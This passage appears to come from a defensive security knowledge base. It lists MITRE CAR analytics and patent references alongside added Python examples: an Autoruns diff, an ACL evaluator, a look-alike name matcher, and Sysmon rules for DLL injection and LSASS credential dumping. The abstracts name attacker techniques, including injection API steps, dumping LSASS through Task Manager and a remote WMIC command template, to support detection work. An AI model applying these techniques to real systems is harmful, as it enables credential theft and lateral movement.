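HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,enabled,(Verified) Microsoft Windows,c:\windows\system32\securityhealthsystray.exe,%windir%\system32\SecurityHealthSystray.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,VMware User Process,enabled,(Verified) VMware,c:\program files\vmware\vmtoolsd.exe,C:\Program Files\VMware\vmtoolsd.exe -n vmusr
Task Scheduler,\Acme Backup,enabled,(Verified) Acme Corp,c:\program files\acme\backup.exe,C:\Program Files\Acme\backup.exe /daily
"""

SNAPSHOT_LATER = r"""Entry Location,Entry,Enabled,Signer,Image Path,Launch String
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,enabled,(Verified) Microsoft Windows,c:\windows\system32\securityhealthsystray.exe,%windir%\system32\SecurityHealthSystray.exe /updated
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,VMware User Process,enabled,(Verified) VMware,c:\program files\vmware\vmtoolsd.exe,C:\Program Files\VMware\vmtoolsd.exe -n vmusr
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Updater,enabled,(Not verified),c:\users\public\updater.exe,C:\Users\Public\updater.exe
Task Scheduler,\Acme Backup,enabled,(Verified) Acme Corp,c:\users\public\backup.exe,C:\Users\Public\backup.exe /daily
"""

# Fields whose change on an existing entry is worth reporting.
TRACKED_FIELDS = ("Enabled", "Signer", "Image Path", "Launch String")


def parse_autoruns(csv_text):
    """Map (Entry Location, Entry) -> row dict for one Autoruns snapshot."""
    entries = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        entries[(row["Entry Location"], row["Entry"])] = row
    return entries


def is_verified_microsoft(row):
    # Autoruns writes "(Verified) <company>" in the Signer column; the analytic
    # ignores Microsoft-signed entries because they dominate the output.
    return row["Signer"].startswith("(Verified) Microsoft")


def autorun_differences(baseline_csv, later_csv, ignore_verified_microsoft=True):
    """Return the entries added, removed, or changed between two snapshots."""
    before = parse_autoruns(baseline_csv)
    after = parse_autoruns(later_csv)
    if ignore_verified_microsoft:
        before = {k: r for k, r in before.items() if not is_verified_microsoft(r)}
        after = {k: r for k, r in after.items() if not is_verified_microsoft(r)}
    added = sorted(set(after) - set(before))
    removed = sorted(set(before) - set(after))
    changed = []
    for key in sorted(set(before) & set(after)):
        diffs = {f: (before[key][f], after[key][f])
                 for f in TRACKED_FIELDS if before[key][f] != after[key][f]}
        if diffs:
            changed.append((key, diffs))
    return {"added": added, "removed": removed, "changed": changed}


if __name__ == "__main__":
    report = autorun_differences(SNAPSHOT_BASELINE, SNAPSHOT_LATER)
    for kind in ("added", "removed", "changed"):
        for item in report[kind]:
            print(kind, item)
```

Which entries to ignore is a tuning decision rather than a property of the technique, so the filter is a parameter: the same function run with ignore_verified_microsoft=False also reports the SecurityHealth launch-string change that the default view hides.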

Usage (5)

kb-abstract

  • "A network switch comprising a switching Application Specific Integrated Circuit (ASIC) and a Virtual Switching Engine (VSE) connected to a plurality of ports. The switching ASIC has a high-speed memory table which enables it to look up addresses that it has previously obtained and to forward unicast packets to said addresses. The VSE is a CPU that makes switching decisions outside of the ASIC and keeps track of any unknown addresses, forwarding the packets out the appropriate ports and answers broadcast packets by proxy for all known addresses without forwarding any of the packets down the VLANs, thereby freeing the VLAN bandwidth from excessive traffic. The system requires no user configuration because the switching methodology is self-adaptive to the network in which it is inserted and has the ability to perform router functions such as level 2 and 3 switching, spanning tree protocols and compatibility with Internetwork Packet and Internetwork Packet Exchange networks."

kb-author

  • "Ballard C. Bare"

kb-mitre-analysis

  • ""

kb-organization

  • "Hewlett Packard Enterprise Development LP"

rdfs:label

  • "Reference - Broadcast isolation and level 3 network switch - Hewlett Packard Enterprise Development LP"

kb-reference-of

kb-reference-title

  • "Broadcast isolation and level 3 network switch"

Usage (5)

kb-abstract

  • "As described in ATT&CK, an adversary can use Windows Management Instrumentation (WMI) to view or manipulate objects on a remote host. It can be used to remotely edit configuration, start services, query files, and anything that can be done with a WMI class. When remote WMI requests are over RPC (CAR-2014-05-001), it connects to a DCOM interface within the RPC group netsvcs. To detect this activity, a sensor is needed at the network level that can decode RPC traffic or on the host where the communication can be detected more natively, such as Event Tracing for Windows. Using wireshark/tshark decoders, the WMI interfaces can be extracted so that WMI activity over RPC can be detected.

    Although the description details how to detect remote WMI precisely, a decent estimate has been to look for the string RPCSS within the initial RPC connection on 135/tcp. It returns a superset of this activity, and will trigger on all DCOM-related services running within RPC, which is likely to also be activity that should be detected between hosts. More about RPCSS at : rpcss_dcom_interfaces.html"

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-11-007: Remote Windows Management Instrumentation (WMI) over RPC - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-11-007: Remote Windows Management Instrumentation (WMI) over RPC"

Usage (5)

kb-abstract

  • "MagicDraw offers the most robust standards compliant [Unified Architecture Framework (UAF)], DoDAF 2.0, MODAF 1.2, NAF 3, and NAF 4 via a UAF standardized solution. And what's more, No Magic fully supports all architectural framework products ensuring you achieve project results. No Magic also leads the industry in usability and interoperability, ensuring that you avoid unnecessary cost, schedule and performance risk."

kb-organization

  • "Dassault Systemes"

rdfs:label

  • "Reference - Catia UAF Plugin"

kb-reference-of

kb-reference-title

  • "Catia UAF Plugin"

Usage (5)

kb-abstract

  • "An access control list (ACL) consists of one or more access control entries (ACEs) that collectively define the network traffic profile. This profile can then be referenced by Cisco IOS XR Software features such as traffic filtering, priority or custom queueing, and dynamic access control. Each ACL includes an action element (permit or deny) and a filter element based on criteria such as source address, destination address, protocol, and protocol-specific parameters."

kb-organization

  • "Cisco"

rdfs:label

  • "Reference - Cisco ASR 9000 Series Aggregation Services Routers - Access List Commands"

kb-reference-of

kb-reference-title

  • "Cisco ASR 9000 Series Aggregation Services Routers - Access List Commands"
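An added example (not Cisco's code or a real router configuration) of the first-match, implicit-deny evaluation that the abstract's action and filter elements imply. The ACL listing is constructed in a simplified IOS XR-style syntax and the parser accepts only the forms it uses: sequence number, permit/deny, protocol, source and destination as "any", "host A.B.C.D" or "A.B.C.D/len", an optional "eq <port>", and trailing keywords such as "log" which are ignored. The shadowed() check is the review step a practitioner wants on a hand-maintained list: it flags ACEs that can never match because an earlier, broader ACE already decides every packet they would see.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional

# Constructed ACL in simplified IOS XR style; not copied from a real device.
SAMPLE_ACL = """
ipv4 access-list MGMT-IN
 10 permit tcp 10.0.0.0/24 any eq 22
 20 deny tcp any any eq 22 log
 30 permit icmp any any
 40 permit tcp 10.0.0.0/24 host 192.0.2.10 eq 443
 50 permit tcp host 10.0.0.7 any eq 22
"""


@dataclass
class Ace:
    seq: int
    action: str                  # "permit" or "deny"
    proto: str                   # "tcp", "udp", "icmp", or "ipv4" meaning any protocol
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network
    dport: Optional[int]         # None when the ACE carries no port match


def _take_addr(tokens, i):
    """Parse one address group starting at tokens[i]; return (network, next index)."""
    if tokens[i] == "any":
        return ipaddress.ip_network("0.0.0.0/0"), i + 1
    if tokens[i] == "host":
        return ipaddress.ip_network(tokens[i + 1] + "/32"), i + 2
    return ipaddress.ip_network(tokens[i], strict=False), i + 1


def parse_acl(text):
    aces = []
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) < 5 or not tokens[0].isdigit():
            continue             # header line ("ipv4 access-list NAME") or blank
        seq, action, proto = int(tokens[0]), tokens[1], tokens[2]
        src, i = _take_addr(tokens, 3)
        dst, i = _take_addr(tokens, i)
        dport = int(tokens[i + 1]) if i < len(tokens) and tokens[i] == "eq" else None
        aces.append(Ace(seq, action, proto, src, dst, dport))
    return sorted(aces, key=lambda a: a.seq)


def _matches(ace, proto, src, dst, dport):
    return (ace.proto in ("ipv4", proto)
            and src in ace.src and dst in ace.dst
            and (ace.dport is None or ace.dport == dport))


def evaluate(aces, proto, src, dst, dport=None):
    """First ACE that matches decides; no match falls through to the implicit deny,
    reported as ("deny", None) so it is distinguishable from an explicit deny."""
    src, dst = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for ace in aces:
        if _matches(ace, proto, src, dst, dport):
            return ace.action, ace.seq
    return "deny", None


def shadowed(aces):
    """Sequence numbers of ACEs that can never match: an earlier ACE covers the same
    protocol, a superset of both address ranges, and the same (or any) port."""
    out = []
    for i, later in enumerate(aces):
        for earlier in aces[:i]:
            if (earlier.proto in ("ipv4", later.proto)
                    and earlier.src.supernet_of(later.src)
                    and earlier.dst.supernet_of(later.dst)
                    and (earlier.dport is None or earlier.dport == later.dport)):
                out.append(later.seq)
                break
    return out


if __name__ == "__main__":
    aces = parse_acl(SAMPLE_ACL)
    print(evaluate(aces, "tcp", "172.16.0.5", "192.0.2.1", 22))   # explicit deny, seq 20
    print(evaluate(aces, "udp", "10.0.0.7", "192.0.2.10", 53))    # implicit deny
    print("shadowed:", shadowed(aces))                             # [50]
```

Sequence 50 in the sample is unreachable because sequence 10 already permits SSH from the whole 10.0.0.0/24; the shadow check reports that, and the second evaluate() call shows that a UDP packet nothing permits is dropped by the implicit deny even though no ACE names it.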

Usage (5)

kb-abstract

  • "An adversary can use accessibility features (Ease of Access), such as StickyKeys or Utilman, to launch a command shell from the logon screen and gain SYSTEM access. Since an adversary does not have physical access to the machine, this technique must be run within Remote Desktop. To prevent an adversary from getting to the login screen without first authenticating, Network-Level Authentication (NLA) must be enabled. If a debugger is set up for one of the accessibility features, then it will intercept the process launch of the feature and instead execute a new command line. This analytic looks for instances of cmd.exe or powershell.exe launched directly from the logon process, winlogon.exe. It should be used in tandem with CAR-2014-11-003, which detects the accessibility programs in the command line."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-11-008: Command Launched from WinLogon - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-11-008: Command Launched from WinLogon"

Usage (5)

kb-abstract

  • "Before exfiltrating data that an adversary has collected, it is very likely that a compressed archive will be created, so that transfer times are minimized and fewer files are transmitted. There is variety between the tools used to compress data, but the command line usage and context of archiving tools, such as ZIP, RAR, and 7ZIP, should be monitored.

    In addition to looking for RAR or 7z program names, command line usage of 7Zip or RAR can be detected with the flag usage of "* a *". This is helpful, as adversaries may change program names."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2013-07-005: Command Line Usage of Archiving Software - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-07-005: Command Line Usage of Archiving Software"

Usage (5)

kb-abstract

  • "Example techniques described herein determine a signature or classification of a data stream such as a file. The classification can indicate whether the data stream is associated with malware. A processor can locate training analysis regions of training data streams based on predetermined structure data, and determining training model inputs based on the training analysis regions. The processor can determine a computational model based on the training model inputs. The computational model can receive an input vector and provide a corresponding feature vector. The processor can then locate a trial analysis region of a trial data stream based on the predetermined structure data and determine a trial model input. The processor can operate the computational model based on the trial model input to provide a trial feature vector, e.g., a signature. The processor can operate a second computational model to provide a classification based on the signature."

kb-author

  • "Sven Krasser; David Elkind; Patrick Crenshaw; Brett Meyer"

kb-mitre-analysis

  • "Provides a mechanism to classify files using file signatures based on a computational model. Training data that comprises at least a portion of a file, e.g. number of bytes, is used as input to the computational model to develop a file signature and classify the file as malware."

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - Computational modeling and classification of data streams - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "Computational modeling and classification of data streams"

Usage (5)

kb-abstract

  • "Methods and systems are disclosed for selecting text character strings from a corpus of relevant strings that would commonly be considered to be visually similar to human viewer to an input string. The initial corpus may be any sufficiently broad or specific source of text, e.g., the names of users in a computer application system. The character strings in the corpus are classified such that direct, character-by-character comparisons may be limited to a small subset of likely-similar strings. The input string is then directly compared to strings that are likely to be similar to it, taking into account individual characters' similarities, combinations of characters that look similar to individual characters, transposition of characters, and simple additions and deletions."

kb-author

  • "Raymond W. Wallace, III"

kb-mitre-analysis

  • "Text input is compared to an engine of look-alike sets of text characters. An estimate of similar characters based on the engine is conducted, and an alert is triggered if the estimated similarity is lower than a given threshold."

kb-organization

  • "Greathorn Inc"

rdfs:label

  • "Reference - Computer-implemented methods and systems for identifying visually similar text character strings - Greathorn Inc"

kb-reference-of

kb-reference-title

  • "Computer-implemented methods and systems for identifying visually similar text character strings"
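An added example of the comparison the abstract describes; it is not Greathorn's implementation, whose classification scheme and character tables are not on the page. Three pieces map onto the abstract: a constructed, deliberately small confusable table (multi-character combinations such as "rn" for "m" are applied before single characters), a "classification" step that buckets the corpus by normalised length so the full comparison runs only against strings whose edit distance can still be within the threshold, and optimal-string-alignment distance for the direct comparison, which charges one edit for an adjacent transposition.

```python
# Constructed, partial look-alike table for illustration only; a production table would
# be far larger (for example, derived from Unicode's confusables data).
MULTI_CHAR_CONFUSABLES = {"rn": "m", "vv": "w", "cl": "d"}
SINGLE_CHAR_CONFUSABLES = {
    "0": "o", "1": "l", "i": "l", "|": "l", "!": "l",
    "5": "s", "$": "s", "3": "e", "8": "b",
    "\u0430": "a",  # Cyrillic a
    "\u0435": "e",  # Cyrillic ie
    "\u043e": "o",  # Cyrillic o
    "\u0440": "p",  # Cyrillic er
    "\u0441": "c",  # Cyrillic es
}


def skeleton(text):
    """Normalise a string so that visually similar strings share one representation."""
    s = text.lower()
    for seq, repl in MULTI_CHAR_CONFUSABLES.items():
        s = s.replace(seq, repl)
    return "".join(SINGLE_CHAR_CONFUSABLES.get(ch, ch) for ch in s)


def osa_distance(a, b):
    """Optimal string alignment distance: insertion, deletion, substitution and
    transposition of two adjacent characters each cost one edit."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def build_index(corpus):
    """Bucket corpus strings by skeleton length; an edit distance of k can change the
    length by at most k, so only nearby buckets need the full comparison."""
    index = {}
    for name in corpus:
        sk = skeleton(name)
        index.setdefault(len(sk), []).append((name, sk))
    return index


def find_lookalikes(candidate, index, max_distance=1):
    """Corpus names visually similar to candidate (identical string excluded),
    as [(name, distance)] sorted by distance then name."""
    sk = skeleton(candidate)
    hits = []
    for length in range(len(sk) - max_distance, len(sk) + max_distance + 1):
        for name, name_sk in index.get(length, []):
            if name == candidate:
                continue
            dist = osa_distance(sk, name_sk)
            if dist <= max_distance:
                hits.append((name, dist))
    return sorted(hits, key=lambda h: (h[1], h[0]))


if __name__ == "__main__":
    # Constructed user directory; the candidate is a display name seen on inbound mail.
    directory = ["John Smith", "Jane Doe", "Jon Smith", "Pat Morgan"]
    index = build_index(directory)
    print(find_lookalikes("J0hn Srnith", index))     # [('John Smith', 0), ('Jon Smith', 1)]
```

A distance of zero after normalisation ("J0hn Srnith" against "John Smith") is the strongest signal, since the strings differ only in confusable characters; the transposition rule is what keeps "Jhon" one edit from "John" rather than two.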

Usage (5)

kb-abstract

  • "A computer worm defense system comprises multiple containment systems tied together by a management system. Each containment system is deployed on a separate communication network and contains a worm sensor and a blocking system. In various embodiments, the computer worm may be transported from a production network, where the computer worm is not readily identifiable, to an alternate network in the worm sensor where the computer worm may be readily identifiable. Computer worm identifiers generated by a worm sensor of one containment system can be provided not only to the blocking system of the same containment system, but can also be distributed by the management system to blocking systems of other containment systems."

kb-author

  • "Ashar Aziz"

kb-mitre-analysis

  • "This patent describes network data being copied by a tap and then analyzed in an analysis environment to determine whether the network data is suspicious using a heuristic module. The analysis environment replays transmission of the suspicious network data between a configured replayer and a virtual machine to detect unauthorized activity."

kb-organization

  • "FireEye Inc"

rdfs:label

  • "Reference - Computer Worm Defense System and Method - FireEye Inc"

kb-reference-of

kb-reference-title

  • "Computer Worm Defense System and Method"

Usage (5)

kb-abstract

  • "Adversaries may use Windows Management Instrumentation (WMI) to move laterally, by launching executables remotely. The analytic CAR-2014-12-001 describes how to detect these processes with network traffic monitoring and process monitoring on the target host. However, if the command line utility wmic.exe is used on the source host, then it can additionally be detected on an analytic. The command line on the source host is constructed into something like wmic.exe /node:"<hostname>" process call create "<command line>". It is possible to also connect via IP address, in which case the string "<hostname>" would instead look like an IP address.

    Although this analytic was created after CAR-2014-12-001, it is a much simpler (although more limited) approach. Processes can be created remotely via WMI in a few other ways, such as more direct API access or the built-in utility PowerShell."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2016-03-002: Create Remote Process via WMIC - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2016-03-002: Create Remote Process via WMIC"

Usage (5)

kb-abstract

  • "Credential dumpers like Mimikatz can be loaded into memory and from there read data from other processes. This analytic looks for instances where processes are requesting specific permissions to read parts of the LSASS process in order to detect when credential dumping is occurring. One weakness is that all current implementations are "overtuned" to look for common access patterns used by Mimikatz."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2019-04-004: Credential Dumping via Mimikatz - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2019-04-004: Credential Dumping via Mimikatz"

Usage (5)

kb-abstract

  • "The Windows Task Manager may be used to dump the memory space of lsass.exe to disk for processing with a credential access tool such as Mimikatz. This is performed by launching Task Manager as a privileged user, selecting lsass.exe, and clicking "Create dump file". This saves a dump file to disk with a deterministic name that includes the name of the process being dumped.

    This requires filesystem data to determine whether files have been created."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2019-08-001: Credential Dumping via Windows Task Manager - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2019-08-001: Credential Dumping via Windows Task Manager"

Usage (5)

kb-abstract

  • "MITRE’s Cyber Command System (CyCS) tool addresses the objective of improved mission assurance in cyberspace by enabling the mapping of mission operations to the network operations that support those missions. This tool provides mission-impact assessment through situational awareness and impact analysis. CyCS addresses mission-assurance challenges for highly distributed enterprise systems of systems through vulnerability, threat, and consequence management."

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - Cyber Command System (CYCS)"

kb-reference-of

kb-reference-title

  • "Cyber Command System (CYCS)"

Usage (5)

kb-abstract

  • "Microsoft Windows allows for processes to remotely create threads within other processes of the same privilege level. This functionality is provided via the Windows API CreateRemoteThread. Both Windows and third-party software use this ability for legitimate purposes. For example, the Windows process csrss.exe creates threads in programs to send signals to registered callback routines. Both adversaries and host-based security software use this functionality to inject DLLs, but for very different purposes. An adversary is likely to inject into a program to evade defenses or bypass User Account Control, but a security program might do this to gain increased monitoring of API calls. One of the most common methods of DLL Injection is through the Windows API LoadLibrary.

    1. Allocate memory in the target program with VirtualAllocEx
    2. Write the name of the DLL to inject into this program with WriteProcessMemory
    3. Create a new thread and set its entry point to LoadLibrary using the API CreateRemoteThread.

    This behavior can be detected by looking for thread creations across processes, and resolving the entry point to determine the function name. If the function is LoadLibraryA or LoadLibraryW, then the intent of the remote thread is clearly to inject a DLL. When this is the case, the source process must be examined so that it can be ignored when it is both expected and a trusted process."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-10-002: DLL Injection via Load Library - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-10-002: DLL Injection via Load Library"
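The three host-telemetry checks above (CAR-2013-10-002 remote threads whose entry point is LoadLibrary, CAR-2019-04-004 LSASS access, CAR-2019-08-001 Task Manager dump files) share one event source and one shape, so this added example runs them together over constructed Sysmon-style records: Event ID 8 (CreateRemoteThread, with SourceImage, TargetImage, StartModule, StartFunction), Event ID 10 (ProcessAccess, with GrantedAccess) and Event ID 11 (FileCreate, with Image and TargetFilename). It is not MITRE's analytic code. The allowlists are placeholders for the trusted sources the DLL-injection analytic says must be excluded, and the lsass.DMP name is an assumption drawn from the Task Manager analytic's description of a deterministic, process-named file. The LSASS check tests for the rights a dumper needs, PROCESS_VM_READ together with a query right, rather than matching the exact masks Mimikatz happens to request; that is the difference between this check and the "overtuned" implementations CAR-2019-04-004 warns about, and it is why a full-access request (0x1FFFFF) is caught below.

```python
import os

# Process access rights from winnt.h.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Assumed tuning allowlists for this environment (placeholders, not a vendor list).
TRUSTED_REMOTE_THREAD_SOURCES = {"sensor.exe"}
TRUSTED_LSASS_READERS = {"msmpeng.exe", "csrss.exe", "wininit.exe"}

# Constructed Sysmon-style events; not real host data.
SAMPLE_EVENTS = [
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": r"C:\Windows\System32\notepad.exe",
     "StartModule": "", "StartFunction": ""},
    {"EventID": 8, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\inj.exe", "TargetImage": r"C:\Windows\explorer.exe",
     "StartModule": r"C:\Windows\System32\KERNEL32.DLL", "StartFunction": "LoadLibraryA"},
    {"EventID": 8, "SourceImage": r"C:\Program Files\EDR\sensor.exe", "TargetImage": r"C:\Windows\System32\svchost.exe",
     "StartModule": r"C:\Windows\System32\KERNEL32.DLL", "StartFunction": "LoadLibraryW"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\Desktop\mimikatz.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1400"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\Desktop\pd.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 11, "Image": r"C:\Windows\System32\Taskmgr.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\lsass.DMP"},
]


def _base(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return os.path.basename(path.replace("\\", "/")).lower()


def check_remote_thread(ev):
    """CAR-2013-10-002: cross-process thread whose entry point resolves to LoadLibraryA/W,
    ignoring sources that are expected to do this (EDR sensors and the like)."""
    if ev.get("StartFunction") not in ("LoadLibraryA", "LoadLibraryW"):
        return False
    return _base(ev["SourceImage"]) not in TRUSTED_REMOTE_THREAD_SOURCES


def check_lsass_access(ev):
    """CAR-2019-04-004 by required rights: reading LSASS memory needs PROCESS_VM_READ and
    a query right, whatever other bits the caller also asked for."""
    if _base(ev["TargetImage"]) != "lsass.exe":
        return False
    if _base(ev["SourceImage"]) in TRUSTED_LSASS_READERS:
        return False
    granted = int(ev["GrantedAccess"], 16)
    wants_read = bool(granted & PROCESS_VM_READ)
    wants_query = bool(granted & (PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION))
    return wants_read and wants_query


def check_lsass_dump_file(ev):
    """CAR-2019-08-001: a file named after the dumped process (assumed: lsass.DMP)."""
    return _base(ev["TargetFilename"]) == "lsass.dmp"


RULES = {8: ("CAR-2013-10-002", check_remote_thread),
         10: ("CAR-2019-04-004", check_lsass_access),
         11: ("CAR-2019-08-001", check_lsass_dump_file)}


def detect(events):
    """Run the rule matching each event's ID; return one alert dict per hit, in event order."""
    alerts = []
    for i, ev in enumerate(events):
        rule = RULES.get(ev["EventID"])
        if rule and rule[1](ev):
            alerts.append({"index": i, "rule": rule[0], "source": ev.get("SourceImage") or ev.get("Image")})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Event 4 (svchost.exe opening LSASS with 0x1400) stays quiet because no PROCESS_VM_READ bit is set, while event 5 fires on 0x1FFFFF, a mask an exact-value list written from Mimikatz samples would not contain.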

Usage (5)

kb-author

  • "Microsoft"

kb-mitre-analysis

  • ""

kb-organization

  • "Microsoft"

rdfs:label

  • "Reference - /DYNAMICBASE (Use address space layout randomization) - Microsoft Docs"

kb-reference-of

kb-reference-title

  • "/DYNAMICBASE (Use address space layout randomization)"

Usage (5)

kb-abstract

  • "Dagger is a modeling and visualization tool suite that shows how system failures impact mission status. Updated with manual or real-time status, Dagger is used for mission/system planning, situational awareness during mission execution, and course-of-action analysis."

kb-author

  • "Jackie Soenneker"

kb-organization

  • "JHU APL"

rdfs:label

  • "Reference - Dagger Fact Sheet"

kb-reference-of

kb-reference-title

  • "Dagger Fact Sheet"

Usage (5)

kb-abstract

  • "Dagger is a modeling and visualization framework that addresses the challenge of representing knowledge and information for decision-makers, enabling them to better comprehend the operational context of network security data. It allows users to answer critical questions such as “Given that I care about mission X, is there any reason I should be worried about what is going on in cyberspace?” or “If this system fails, will I still be able to accomplish my mission?”."

kb-author

  • "Elisha Peterson"

kb-organization

  • "JHU APL"

rdfs:label

  • "Reference - Dagger: Modeling and visualization for mission impact situational awareness"

kb-reference-of

kb-reference-title

  • "Dagger: Modeling and visualization for mission impact situational awareness"

Usage (5)

kb-abstract

  • "Malware depends on its ability to insert a malicious payload into memory with the hope that it will be executed later. Wouldn't it be great if you could prevent malware from running if it wrote to an area that has been allocated solely for the storage of information?

    Data Execution Prevention (DEP) does exactly that, by substantially reducing the range of memory that malicious code can use for its benefit. DEP uses the No eXecute bit on modern CPUs to mark blocks of memory as read-only so that those blocks can't be used to execute malicious code that may be inserted by means of a vulnerability exploit."

kb-author

  • "Nick Schonning, Daniel Simpson, Marty Hernandez Avedon, Trond B. Krokli, jreeds, jcaparas, Andres Mariano Gorzelany, Tina Burden, Thomas Raya, Justin Hall, justanotheranonymoususer, Liza Poggemeyer, Dani Halfin, imba-tjd (Authors for entire page)"

kb-mitre-analysis

  • ""

kb-organization

  • "Microsoft"

rdfs:label

  • "Reference - Mitigate threats by using Windows 10 security features: Data Execution Prevention - Microsoft"

kb-reference-of

kb-reference-title

  • "Mitigate threats by using Windows 10 security features: Data Execution Prevention"

Usage (5)

kb-abstract

  • "In particular embodiments, a data processing data inventory generation system is configured to: (1) generate a data model (e.g., a data inventory) for one or more data assets utilized by a particular organization; (2) generate a respective data inventory for each of the one or more data assets; and (3) map one or more relationships between one or more aspects of the data inventory, the one or more data assets, etc. within the data model. In particular embodiments, a data asset (e.g., data system, software application, etc.) may include, for example, any entity that collects, processes, contains, and/or transfers personal data (e.g., such as a software application, “internet of things” computerized device, database, website, data-center, server, etc.). The system may be configured to identify particular data assets and/or personal data in data repositories using any suitable intelligent identity scanning technique."

kb-author

  • "Kabir A. Barday, Mihir S. Karanjkar, Steven W. Finch, Ken A. Browne, Nathan W. Heard, Aakash H. Patel, Jason L. Sabourin, Richard L. Daniel, Dylan D. Patton-Kuhl, Jonathan Blake Brannon"

kb-organization

  • "OneTrust LLC"

rdfs:label

  • "Reference - Data processing and scanning systems for generating and populating a data inventory"

kb-reference-of

kb-reference-title

  • "Data processing and scanning systems for generating and populating a data inventory"

Usage (5)

kb-author

  • "Steven Kirsch"

rdfs:label

  • "Reference - Database for receiving, storing and compiling information about email messages"

kb-reference-of

kb-reference-title

  • "Database for receiving, storing and compiling information about email messages"

Usage (5)

kb-abstract

  • "The Windows Registry location HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options allows for parameters to be set for applications during execution. One feature used by malicious actors is the "Debugger" option. When a key has this value enabled, a Debugging command line can be specified. Windows will launch the Debugging command line, and pass the original command line in as an argument. Adversaries can set a Debugger for Accessibility Applications. The analytic looks for the original command line as an argument to the Debugger. When the strings "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe", and "Magnify.exe" are detected in the arguments, but not as the main executable, it is very likely that a Debugger is set.

    This analytic could depend on the possibility of the known strings used as arguments for other applications used in the day-to-day environment. Although the chance of the string "sethc.exe" being used as an argument for another application is unlikely, it still is a possibility."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-11-003: Debuggers for Accessibility Applications - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-11-003: Debuggers for Accessibility Applications"
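The four process-creation analytics in this listing (CAR-2014-11-008 shells spawned by winlogon.exe, CAR-2014-11-003 accessibility program names passed as arguments, CAR-2016-03-002 wmic.exe remote process creation, CAR-2013-07-005 archiver "a" flag usage) all reduce to tests on a process image, its parent and its command line, so one added example covers them over constructed Sysmon Event ID 1 style records. This is not MITRE's code; the tokenizer is a minimal Windows-style splitter that honours double quotes, and the field names follow Sysmon's Image, ParentImage and CommandLine. The accessibility rule deliberately checks arguments only, not the main executable, since an IFEO Debugger launch looks like <debugger> "<original command line>"; the archiver rule keys on the first argument being exactly "a", which is why the renamed archiver in the sample still matches and why the analytic warns it can be noisy.

```python
import os
import re

ACCESSIBILITY_PROGRAMS = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe", "magnify.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
WMIC_REMOTE_CREATE = re.compile(r"/node:\S+.*\bprocess\s+call\s+create\b", re.IGNORECASE)

# Constructed Sysmon Event ID 1 style records; not real host data.
SAMPLE_EVENTS = [
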